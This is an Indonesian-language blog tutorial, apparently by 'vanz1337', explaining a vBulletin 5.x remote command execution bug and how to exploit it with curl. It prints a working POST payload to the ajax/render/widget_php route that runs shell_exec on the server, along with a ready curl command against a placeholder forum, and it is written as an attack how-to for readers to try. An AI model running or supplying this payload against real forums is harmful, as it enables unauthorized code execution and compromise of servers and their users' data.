ExploitTutorial

vBulletin 5.x – Remote Command Execution With Curl

vBulletin 5.x – Remote Command Execution With Curl, Sebelum ketahap berikutnya kita jelaskan dulu apa itu Remote Command Execution (RCE) & Apa itu Curl. Remote Command Execution (RCE)atau Remote Arbitary Command Execution (ACE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url & Curl adalah sebuah program dan library untuk mengirim dan mengambil data melalui URL.

[+] Full Path : https://forum.target.com/
[+] Post Data : “routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec(‘uname -a’);”

Disini Kita Exectionnya via curl.

contoh command :Β 

curl -s “https://forum.target.com/” –dataΒ  “routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec(‘uname -a’);”

inilah hasil dari execution di atas terlihat sebuah karnel.


Sekian Tutorial Dari Saya.
Nako48

vanz1337

Saya Adalah Seorang yang tertarik akan dunia teknologi, hobi saya ngidol+ngoding

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

Close
Back to top button
Close
Close
Advertisment ad adsense adlogger